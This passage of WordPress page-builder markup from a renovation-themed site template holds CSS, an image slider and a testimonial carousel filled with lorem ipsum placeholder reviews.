{\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":450,\"autoPlay\":true,\"autoPlaySpeed\":\"2000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#ffffff\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"ca90f3dd-ac39-45a1-b448-4f4d323edecb\"} -->\n<style type=\"text/css\"> .block-id-ca90f3dd-ac39-45a1-b448-4f4d323edecb .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-ca90f3dd-ac39-45a1-b448-4f4d323edecb .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-ca90f3dd-ac39-45a1-b448-4f4d323edecb .skt-blocks-gallery--item figure {\n height: 430px; }\n</style><div class=\"\"><div class=\"block-id-ca90f3dd-ac39-45a1-b448-4f4d323edecb is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:450px\" data-flickity=\"{&quot;autoPlay&quot;:2000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"424cb1af-2a1b-4163-a4f3-8d11acf339b8\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-4\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-4 skt-blocks-block-section-outer-wrap block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"2caf698d-f57b-4edb-a3c6-802f06514e20\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":32,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-2caf698d-f57b-4edb-a3c6-802f06514e20\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Testimonials</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Read Our Clients<br>Latest Reviews</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/testimonial-slider {\"classMigrate\":true,\"test_block\":[{\"description\":\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8f05029117\",\"delete\":\"a8ff1c4035\",\"edit\":\"ee60ba071d\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8c7518bbdc\",\"delete\":\"de8f66528c\",\"edit\":\"99bb75a0ef\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":16,\"title\":\"blog-img\",\"filename\":\"blog-img.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-img/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"blog-img\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:32.000Z\",\"modified\":\"2021-05-25T13:48:32.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"25f63e1ba1\",\"delete\":\"1ea75ab2d2\",\"edit\":\"f534b4e6c3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=16u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":53731,\"filesizeHumanReadable\":\"52 KB\",\"context\":\"\",\"height\":400,\"width\":560,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\",\"orientation\":\"landscape\"},\"medium\":{\"height\":214,\"width\":300,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-300x214.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"height\":400,\"width\":560,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"descColor\":\"#494848\",\"companyColor\":\"#303030\",\"authorColor\":\"#303030\",\"imagePosition\":\"left\",\"nameFontSize\":21,\"nameFontFamily\":\"Poppins\",\"nameFontWeight\":\"600\",\"companyFontSize\":16,\"companyFontFamily\":\"Poppins\",\"companyFontWeight\":\"400\",\"descFontSize\":16,\"descFontFamily\":\"Poppins\",\"descFontWeight\":\"400\",\"nameSpace\":10,\"descSpace\":20,\"block_id\":\"9a21f129\",\"imgVrPadding\":5,\"imgHrPadding\":20,\"columns\":2,\"transitionSpeed\":1000,\"autoplaySpeed\":5000,\"arrowDots\":\"dots\",\"rowGap\":20,\"columnGap\":25,\"contentPadding\":30,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\",\"arrowColor\":\"#fe8333\"} -->\n<style type=\"text/css\"> .skt-blocks-slick-carousel.skt-blocks-block-9a21f129 button.slick-arrow {\n border-width: 1px; border-radius: 0px; border-color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-9a21f129 ul.slick-dots li button:before, ul.slick-dots li.slick-active button:before {\n color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-9a21f129 .slick-arrow svg {\n fill: #fe8333; height: 20px; width: 20px; }\n .skt-blocks-tm__image img{\n width: 60px; max-width: 60px; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-color .skt-blocks-tm__content{\n background-color: #ffffff; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__content{\n background-image: url(null); background-position: center center; background-repeat: no-repeat; background-size: cover; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__overlay{\n background-color: undefined; opacity: 0.5; }\n .skt-blocks-testimonial__wrap {\n padding-left: 12.5px; padding-right: 12.5px; margin-bottom: 20px; }\n .skt-blocks-testimonial__wrap .skt-blocks-tm__image-content {\n padding-left: 20px; padding-right: 20px; padding-top: 5px; padding-bottom: 5px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-tm__desc {\n padding: 20px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap:before {\n border-top: 10px solid center; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap {\n background-color: center; border-radius: 0px; }\n</style><div class=\"skt-blocks-testomonial__outer-wrap skt-blocks-slick-carousel skt-blocks-tm__arrow-outside skt-blocks-block-9a21f129\"><div class=\"is-carousel skt-blocks-tm__columns-2 skt-blocks-tm__items responsive-testimonial-slick-carousel skt-blocks-block-9a21f129\"><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/testimonial-slider --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"310f3dbd-be56-4fc5-b52f-00b541d1d06c\"} -->\n<style type=\"text/css\"> .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; 